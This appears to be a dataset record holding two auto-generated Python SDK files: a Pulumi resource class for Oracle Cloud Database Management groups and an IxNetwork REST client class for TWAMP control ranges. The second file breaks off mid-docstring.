[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ManagedDatabaseGroupArgs', 'ManagedDatabaseGroup']
@pulumi.input_type
class ManagedDatabaseGroupArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None,
managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a ManagedDatabaseGroup resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
:param pulumi.Input[str] description: (Updatable) The information specified by the user about the Managed Database Group.
:param pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]] managed_databases: (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
:param pulumi.Input[str] name: The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
"""
pulumi.set(__self__, "compartment_id", compartment_id)
if description is not None:
pulumi.set(__self__, "description", description)
if managed_databases is not None:
pulumi.set(__self__, "managed_databases", managed_databases)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Input[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: pulumi.Input[str]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The information specified by the user about the Managed Database Group.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="managedDatabases")
def managed_databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]]:
"""
(Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
"""
return pulumi.get(self, "managed_databases")
@managed_databases.setter
def managed_databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]]):
pulumi.set(self, "managed_databases", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _ManagedDatabaseGroupState:
def __init__(__self__, *,
compartment_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ManagedDatabaseGroup resources.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
:param pulumi.Input[str] description: (Updatable) The information specified by the user about the Managed Database Group.
:param pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]] managed_databases: (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
:param pulumi.Input[str] name: The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
:param pulumi.Input[str] state: The current lifecycle state of the Managed Database Group.
:param pulumi.Input[str] time_created: The date and time the Managed Database Group was created.
:param pulumi.Input[str] time_updated: The date and time the Managed Database Group was last updated.
"""
if compartment_id is not None:
pulumi.set(__self__, "compartment_id", compartment_id)
if description is not None:
pulumi.set(__self__, "description", description)
if managed_databases is not None:
pulumi.set(__self__, "managed_databases", managed_databases)
if name is not None:
pulumi.set(__self__, "name", name)
if state is not None:
pulumi.set(__self__, "state", state)
if time_created is not None:
pulumi.set(__self__, "time_created", time_created)
if time_updated is not None:
pulumi.set(__self__, "time_updated", time_updated)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
"""
return pulumi.get(self, "compartment_id")
@compartment_id.setter
def compartment_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "compartment_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The information specified by the user about the Managed Database Group.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="managedDatabases")
def managed_databases(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]]:
"""
(Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
"""
return pulumi.get(self, "managed_databases")
@managed_databases.setter
def managed_databases(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ManagedDatabaseGroupManagedDatabaseArgs']]]]):
pulumi.set(self, "managed_databases", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current lifecycle state of the Managed Database Group.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the Managed Database Group was created.
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
The date and time the Managed Database Group was last updated.
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
class ManagedDatabaseGroup(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Managed Database Group resource in Oracle Cloud Infrastructure Database Management service.
Creates a Managed Database Group. The group does not contain any
Managed Databases when it is created, and they must be added later.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_managed_database_group = oci.databasemanagement.ManagedDatabaseGroup("testManagedDatabaseGroup",
compartment_id=var["compartment_id"],
description=var["managed_database_group_description"],
managed_databases=[oci.databasemanagement.ManagedDatabaseGroupManagedDatabaseArgs(
id=var["managed_database_id"],
)])
```
## Import
ManagedDatabaseGroups can be imported using the `id`, e.g.
```sh
$ pulumi import oci:databasemanagement/managedDatabaseGroup:ManagedDatabaseGroup test_managed_database_group "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
:param pulumi.Input[str] description: (Updatable) The information specified by the user about the Managed Database Group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]] managed_databases: (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
:param pulumi.Input[str] name: The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ManagedDatabaseGroupArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Managed Database Group resource in Oracle Cloud Infrastructure Database Management service.
Creates a Managed Database Group. The group does not contain any
Managed Databases when it is created, and they must be added later.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_managed_database_group = oci.databasemanagement.ManagedDatabaseGroup("testManagedDatabaseGroup",
compartment_id=var["compartment_id"],
description=var["managed_database_group_description"],
managed_databases=[oci.databasemanagement.ManagedDatabaseGroupManagedDatabaseArgs(
id=var["managed_database_id"],
)])
```
## Import
ManagedDatabaseGroups can be imported using the `id`, e.g.
```sh
$ pulumi import oci:databasemanagement/managedDatabaseGroup:ManagedDatabaseGroup test_managed_database_group "id"
```
:param str resource_name: The name of the resource.
:param ManagedDatabaseGroupArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ManagedDatabaseGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ManagedDatabaseGroupArgs.__new__(ManagedDatabaseGroupArgs)
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["description"] = description
__props__.__dict__["managed_databases"] = managed_databases
__props__.__dict__["name"] = name
__props__.__dict__["state"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
super(ManagedDatabaseGroup, __self__).__init__(
'oci:databasemanagement/managedDatabaseGroup:ManagedDatabaseGroup',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
managed_databases: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None) -> 'ManagedDatabaseGroup':
"""
Get an existing ManagedDatabaseGroup resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
:param pulumi.Input[str] description: (Updatable) The information specified by the user about the Managed Database Group.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ManagedDatabaseGroupManagedDatabaseArgs']]]] managed_databases: (Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
:param pulumi.Input[str] name: The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
:param pulumi.Input[str] state: The current lifecycle state of the Managed Database Group.
:param pulumi.Input[str] time_created: The date and time the Managed Database Group was created.
:param pulumi.Input[str] time_updated: The date and time the Managed Database Group was last updated.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ManagedDatabaseGroupState.__new__(_ManagedDatabaseGroupState)
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["description"] = description
__props__.__dict__["managed_databases"] = managed_databases
__props__.__dict__["name"] = name
__props__.__dict__["state"] = state
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
return ManagedDatabaseGroup(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment in which the Managed Database Group resides.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
(Updatable) The information specified by the user about the Managed Database Group.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="managedDatabases")
def managed_databases(self) -> pulumi.Output[Sequence['outputs.ManagedDatabaseGroupManagedDatabase']]:
"""
(Updatable) Set of Managed Databases that the user wants to add to the Managed Database Group. Specifying a block will add the Managed Database to Managed Database Group and removing the block will remove Managed Database from the Managed Database Group.
"""
return pulumi.get(self, "managed_databases")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the Managed Database Group. Valid characters are uppercase or lowercase letters, numbers, and "_". The name of the Managed Database Group cannot be modified. It must be unique in the compartment and must begin with an alphabetic character.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current lifecycle state of the Managed Database Group.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time the Managed Database Group was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
The date and time the Managed Database Group was last updated.
"""
return pulumi.get(self, "time_updated")
| 52.06338
| 386
| 0.688264
| 2,570
| 22,179
| 5.770039
| 0.081712
| 0.064536
| 0.095758
| 0.086857
| 0.8538
| 0.834918
| 0.821364
| 0.81199
| 0.808551
| 0.783735
| 0
| 0.000058
| 0.222598
| 22,179
| 425
| 387
| 52.185882
| 0.859993
| 0.444294
| 0
| 0.634361
| 1
| 0
| 0.127932
| 0.042822
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15859
| false
| 0.004405
| 0.030837
| 0
| 0.286344
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a138862a9fdc3db4049cd1d3b53d0df20618edaa
| 80,080
|
py
|
Python
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/twampcontrolrange_fb880ea2c31503d8e42c8c4e7bc0f7b7.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 20
|
2019-05-07T01:59:14.000Z
|
2022-02-11T05:24:47.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/twampcontrolrange_fb880ea2c31503d8e42c8c4e7bc0f7b7.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 60
|
2019-04-03T18:59:35.000Z
|
2022-02-22T12:05:05.000Z
|
ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocolstack/twampcontrolrange_fb880ea2c31503d8e42c8c4e7bc0f7b7.py
|
OpenIxia/ixnetwork_restpy
|
f628db450573a104f327cf3c737ca25586e067ae
|
[
"MIT"
] | 13
|
2019-05-20T10:48:31.000Z
|
2021-10-06T07:45:44.000Z
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
from typing import List, Any, Union
class TwampControlRange(Base):
"""Represents a range of TWAMP Control-Clients and Session-Sender.
The TwampControlRange class encapsulates a list of twampControlRange resources that are managed by the user.
A list of resources can be retrieved from the server using the TwampControlRange.find() method.
The list can be managed by using the TwampControlRange.add() and TwampControlRange.remove() methods.
"""
__slots__ = ()
_SDM_NAME = 'twampControlRange'
_SDM_ATT_MAP = {
'ControlServerIpIncrement': 'controlServerIpIncrement',
'ControlServerPort': 'controlServerPort',
'ControlStartServerIp': 'controlStartServerIp',
'Count': 'count',
'Enabled': 'enabled',
'KeyId': 'keyId',
'Mode': 'mode',
'Name': 'name',
'ObjectId': 'objectId',
'Secret': 'secret',
}
_SDM_ENUM_MAP = {
}
def __init__(self, parent, list_op=False):
super(TwampControlRange, self).__init__(parent, list_op)
@property
def ControlServerIpIncrement(self):
# type: () -> str
"""
Returns
-------
- str: Increment to use for above field when expanding sessions from this range
"""
return self._get_attribute(self._SDM_ATT_MAP['ControlServerIpIncrement'])
@ControlServerIpIncrement.setter
def ControlServerIpIncrement(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['ControlServerIpIncrement'], value)
@property
def ControlServerPort(self):
# type: () -> int
"""
Returns
-------
- number: TWAMP Control-Server TCP port.
"""
return self._get_attribute(self._SDM_ATT_MAP['ControlServerPort'])
@ControlServerPort.setter
def ControlServerPort(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['ControlServerPort'], value)
@property
def ControlStartServerIp(self):
# type: () -> str
"""
Returns
-------
- str: IP from which the Server accepts a Control-Session
"""
return self._get_attribute(self._SDM_ATT_MAP['ControlStartServerIp'])
@ControlStartServerIp.setter
def ControlStartServerIp(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['ControlStartServerIp'], value)
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Total number of control sessions
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@Count.setter
def Count(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Count'], value)
@property
def Enabled(self):
# type: () -> bool
"""
Returns
-------
- bool: Disabled ranges won't be configured nor validated.
"""
return self._get_attribute(self._SDM_ATT_MAP['Enabled'])
@Enabled.setter
def Enabled(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP['Enabled'], value)
@property
def KeyId(self):
# type: () -> str
"""
Returns
-------
- str: Indicates which shared secret the client wishes to use to authenticate or encrypt. [RFC 4656]
"""
return self._get_attribute(self._SDM_ATT_MAP['KeyId'])
@KeyId.setter
def KeyId(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['KeyId'], value)
@property
def Mode(self):
# type: () -> str
"""
Returns
-------
- str: TWAMP mode of operation for the Control and Test Sessions
"""
return self._get_attribute(self._SDM_ATT_MAP['Mode'])
@Mode.setter
def Mode(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Mode'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of range
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def ObjectId(self):
# type: () -> str
"""
Returns
-------
- str: Unique identifier for this object
"""
return self._get_attribute(self._SDM_ATT_MAP['ObjectId'])
@property
def Secret(self):
# type: () -> str
"""
Returns
-------
- str: Shared secret used for key derivation
"""
return self._get_attribute(self._SDM_ATT_MAP['Secret'])
@Secret.setter
def Secret(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Secret'], value)
def update(self, ControlServerIpIncrement=None, ControlServerPort=None, ControlStartServerIp=None, Count=None, Enabled=None, KeyId=None, Mode=None, Name=None, Secret=None):
# type: (str, int, str, int, bool, str, str, str, str) -> TwampControlRange
"""Updates twampControlRange resource on the server.
Args
----
- ControlServerIpIncrement (str): Increment to use for above field when expanding sessions from this range
- ControlServerPort (number): TWAMP Control-Server TCP port.
- ControlStartServerIp (str): IP from which the Server accepts a Control-Session
- Count (number): Total number of control sessions
- Enabled (bool): Disabled ranges won't be configured nor validated.
- KeyId (str): Indicates which shared secret the client wishes to use to authenticate or encrypt. [RFC 4656]
- Mode (str): TWAMP mode of operation for the Control and Test Sessions
- Name (str): Name of range
- Secret (str): Shared secret used for key derivation
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ControlServerIpIncrement=None, ControlServerPort=None, ControlStartServerIp=None, Count=None, Enabled=None, KeyId=None, Mode=None, Name=None, Secret=None):
# type: (str, int, str, int, bool, str, str, str, str) -> TwampControlRange
"""Adds a new twampControlRange resource on the server and adds it to the container.
Args
----
- ControlServerIpIncrement (str): Increment to use for above field when expanding sessions from this range
- ControlServerPort (number): TWAMP Control-Server TCP port.
- ControlStartServerIp (str): IP from which the Server accepts a Control-Session
- Count (number): Total number of control sessions
- Enabled (bool): Disabled ranges won't be configured nor validated.
- KeyId (str): Indicates which shared secret the client wishes to use to authenticate or encrypt. [RFC 4656]
- Mode (str): TWAMP mode of operation for the Control and Test Sessions
- Name (str): Name of range
- Secret (str): Shared secret used for key derivation
Returns
-------
- self: This instance with all currently retrieved twampControlRange resources using find and the newly added twampControlRange resources available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
"""Deletes all the contained twampControlRange resources in this instance from the server.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, ControlServerIpIncrement=None, ControlServerPort=None, ControlStartServerIp=None, Count=None, Enabled=None, KeyId=None, Mode=None, Name=None, ObjectId=None, Secret=None):
# type: (str, int, str, int, bool, str, str, str, str, str) -> TwampControlRange
"""Finds and retrieves twampControlRange resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve twampControlRange resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all twampControlRange resources from the server.
Args
----
- ControlServerIpIncrement (str): Increment to use for above field when expanding sessions from this range
- ControlServerPort (number): TWAMP Control-Server TCP port.
- ControlStartServerIp (str): IP from which the Server accepts a Control-Session
- Count (number): Total number of control sessions
- Enabled (bool): Disabled ranges won't be configured nor validated.
- KeyId (str): Indicates which shared secret the client wishes to use to authenticate or encrypt. [RFC 4656]
- Mode (str): TWAMP mode of operation for the Control and Test Sessions
- Name (str): Name of range
- ObjectId (str): Unique identifier for this object
- Secret (str): Shared secret used for key derivation
Returns
-------
- self: This instance with matching twampControlRange resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of twampControlRange data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the twampControlRange resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def CustomProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the customProtocolStack operation on the server.
Create custom protocol stack under /vport/protocolStack
customProtocolStack(Arg2=list, Arg3=enum, async_operation=bool)
---------------------------------------------------------------
- Arg2 (list(str)): List of plugin types to be added in the new custom stack
- Arg3 (str(kAppend | kMerge | kOverwrite)): Append, merge or overwrite existing protocol stack
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('customProtocolStack', payload=payload, response_object=None)
def DisableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the disableProtocolStack operation on the server.
Disable a protocol under protocolStack using the class name
disableProtocolStack(Arg2=string, async_operation=bool)string
-------------------------------------------------------------
- Arg2 (str): Protocol class name to disable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('disableProtocolStack', payload=payload, response_object=None)
def EnableProtocolStack(self, *args, **kwargs):
# type: (*Any, **Any) -> Union[str, None]
"""Executes the enableProtocolStack operation on the server.
Enable a protocol under protocolStack using the class name
enableProtocolStack(Arg2=string, async_operation=bool)string
------------------------------------------------------------
- Arg2 (str): Protocol class name to enable
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
- Returns str: Status of the exec
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self.href }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('enableProtocolStack', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the start operation on the server.
Negotiate sessions for all protocols on all ranges belonging to selected plugins
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
start(async_operation=bool)
---------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
start(Arg2=enum, async_operation=bool)
--------------------------------------
